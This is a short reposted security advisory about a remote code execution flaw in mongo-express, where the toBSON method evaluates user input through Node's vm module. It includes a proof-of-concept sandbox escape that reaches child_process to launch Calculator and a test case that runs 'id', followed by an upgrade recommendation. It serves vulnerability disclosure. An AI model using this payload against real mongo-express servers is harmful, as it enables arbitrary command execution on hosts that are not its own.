mongo-express Remote Code Execution Vulnerability

Category: Software development and applications    Date: 2020-01-08 21:02    Views: 743

Source

https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215

Vulnerability details

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap 3.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that use the toBSON method. That method misuses the vm dependency to evaluate user-supplied input in a non-safe environment, so code passed to it can reach the host process and run commands.

PoC by Jonathan Leitschuh

    // macOS
    this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

    // Mocha test case against the toBSON helper; `bson` is mongo-express's own
    // lib/bson module as loaded by its test suite (path assumed).
    const bson = require('../lib/bson');

    it('should not be executable', function () {
      const test = `
        this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
      `;
      const result = bson.toBSON(test);
    });

Remediation

Upgrade mongo-express to version 0.54.0 or higher.
